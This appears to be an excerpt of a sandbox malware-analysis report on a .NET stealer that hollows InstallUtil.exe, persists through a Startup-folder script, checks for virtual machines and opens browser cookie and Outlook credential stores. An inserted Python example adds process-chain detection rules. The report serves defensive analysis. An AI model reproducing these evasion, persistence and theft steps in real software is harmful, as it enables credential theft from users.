                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594842Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594730Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594623Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594458Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594329Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594204Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594059Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593890Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593671Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 593555Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599780Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599203Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595736Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595596Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595463Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595341Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595164Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594922Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 594094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Thread delayed: delay time: 593860
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: wscript.exe, 00000002.00000002.1444787963.000001F4D61B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: InstallUtil.exe, 00000004.00000002.2566343154.0000000000687000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll934e
Source: XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: XsdType.exe, 00000003.00000002.1463433201.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Microsoft|VMWare|Virtual
Source: InstallUtil.exe, 00000001.00000002.2567835645.0000000000EFD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 1_2_064B8FE8 LdrInitializeThunk,1_2_064B8FE8
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Roaming\XsdType.exe "C:\Users\user\AppData\Roaming\XsdType.exe"
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Queries volume information: C:\Users\user\Desktop\pbgjw8i8N7.exe VolumeInformation
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Queries volume information: C:\Users\user\AppData\Roaming\XsdType.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XsdType.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\pbgjw8i8N7.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
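The three "Process created" entries above form the whole execution chain: the sample launches the framework's InstallUtil.exe with nothing but its own path (a hollowing host, since a genuine InstallUtil run carries an assembly path and /i or /u), and after the Startup-folder VBS is run, wscript.exe launches the dropped XsdType.exe from AppData\Roaming, which repeats the InstallUtil.exe launch. The following is an added detection example, not part of the Joe Sandbox report: three rules run over constructed process-creation events that mirror those entries, plus a made-up benign InstallUtil run as a control. The event schema, the rule names and the benign vendor path are assumptions of this example.

```python
"""Detection rules for the process chain in the report, run over constructed
process-creation events. Added example, not part of the Joe Sandbox report;
the event schema and rule names are my own."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # full path of the creating process
    image: str     # full path of the created process
    cmdline: str   # command line of the created process


# Framework InstallUtil.exe in either bitness and any CLR version directory.
INSTALLUTIL = re.compile(
    r"\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\InstallUtil\.exe$", re.I)
# Executables under the user profile, where the sample dropped XsdType.exe.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Return the names of every rule that fires for one event."""
    hits = []
    # Rule 1: InstallUtil.exe started with nothing but its own path. A legitimate
    # run passes an assembly and /i or /u; a bare launch is the hollowing-host
    # pattern that appears twice in the report.
    if INSTALLUTIL.search(ev.image):
        args = ev.cmdline.strip().strip('"').lower()
        if args in ("", ev.image.lower()):
            hits.append("installutil_no_args")
    # Rule 2: wscript/cscript launching an .exe out of the user profile, which is
    # how the Startup-folder XsdType.vbs brings XsdType.exe back after a reboot.
    if (basename(ev.parent) in SCRIPT_HOSTS
            and USER_WRITABLE.search(ev.image)
            and ev.image.lower().endswith(".exe")):
        hits.append("script_host_spawns_appdata_exe")
    # Rule 3: an executable under AppData spawning the framework's InstallUtil.exe.
    if USER_WRITABLE.search(ev.parent) and INSTALLUTIL.search(ev.image):
        hits.append("appdata_parent_spawns_installutil")
    return hits


INSTALLUTIL_PATH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
XSDTYPE_PATH = r"C:\Users\user\AppData\Roaming\XsdType.exe"

# Constructed events mirroring the report's three "Process created" lines, plus
# a benign InstallUtil run under a made-up vendor directory as a control.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\user\Desktop\pbgjw8i8N7.exe", INSTALLUTIL_PATH,
              f'"{INSTALLUTIL_PATH}"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", XSDTYPE_PATH,
              f'"{XSDTYPE_PATH}" '),
    ProcEvent(XSDTYPE_PATH, INSTALLUTIL_PATH, f'"{INSTALLUTIL_PATH}"'),
    ProcEvent(r"C:\Program Files\ExampleVendor\setup.exe", INSTALLUTIL_PATH,
              f'"{INSTALLUTIL_PATH}" /i "C:\\Program Files\\ExampleVendor\\Service.exe"'),
]


def scan(events=SAMPLE_EVENTS):
    """Run every rule over every event; returns one hit list per event, in order."""
    return [detect(e) for e in events]


if __name__ == "__main__":
    for ev, hits in zip(SAMPLE_EVENTS, scan()):
        print(f"{basename(ev.parent)} -> {basename(ev.image)}: {hits or 'clean'}")
```

Rule 1 is the one worth keeping in production: the bare InstallUtil.exe launch is a stable indicator regardless of which .NET stealer family uses it, while Rules 2 and 3 depend on this sample's drop location and need a tuned allowlist on developer workstations.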

                      Stealing of Sensitive Information

Source: Yara match | File source: 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR

Source: Yara match | File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match | File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 7500, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: 00000001.00000002.2570925272.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2570925272.0000000002CEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2569306283.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR

Source: Yara match | File source: 1.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3d0c7d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.XsdType.exe.3bbbdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3acd590.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.pbgjw8i8N7.exe.3b1bdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2570925272.0000000002C2E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.1478818577.0000000003BBB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2569306283.00000000024CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2565094971.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.00000000039B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1349861546.0000000003ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: pbgjw8i8N7.exe PID: 1988, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: XsdType.exe PID: 6732, type: MEMORYSTR

MITRE ATT&CK matrix (one line per tactic, cells in the order of the report's rows; the number in front of a technique is the count of signatures mapped to it)

